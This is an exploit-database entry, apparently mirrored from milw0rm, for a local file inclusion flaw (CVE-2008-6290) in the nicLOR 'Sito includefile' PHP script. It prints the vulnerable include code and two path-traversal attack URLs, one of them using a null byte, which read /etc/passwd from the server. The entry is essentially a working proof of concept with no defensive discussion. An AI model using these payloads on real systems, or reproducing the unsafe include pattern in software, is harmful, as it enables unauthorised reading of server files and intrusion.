[] NeoSense
E X P L O I T S
title author type platform port cve id

nicLOR Sito - includefile Local File Inclusion

Author: StAkeR
type: webapps
platform: php
port: 
date_added: 2008-11-03 
date_updated:  
verified: 1 
codes: OSVDB-49567;CVE-2008-6290 
tags: 
aliases:  
screenshot_url:  
application_url: 
# ------------------------------------------------------------
# Sito includefile in PHP Local File Inclusion Vulnerabilities
# ------------------------------------------------------------
# Discovered By StAkeR[at]hotmail[dot]it
# Download On http://www.niclor.net/prodotti/include_Sito_PHP/include_Sito_PHP.zip
# -----------------------------------------------------------

# File (includefile.php)
# Register Globals On
1. <?
2. if (($page != "") or ($page == "home")) {
3.    include "pagine/$page_file";
4. } else {
5.    include "pagine/home.php";
6. }
7. ?>

# includefile.php?page=athos&page_file=../../../../../../etc/passwd

# File (index.php)
# Magic_Quotes_GPC
# index.php?id=../../../../../etc/passwd%00

# milw0rm.com [2008-11-04]
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.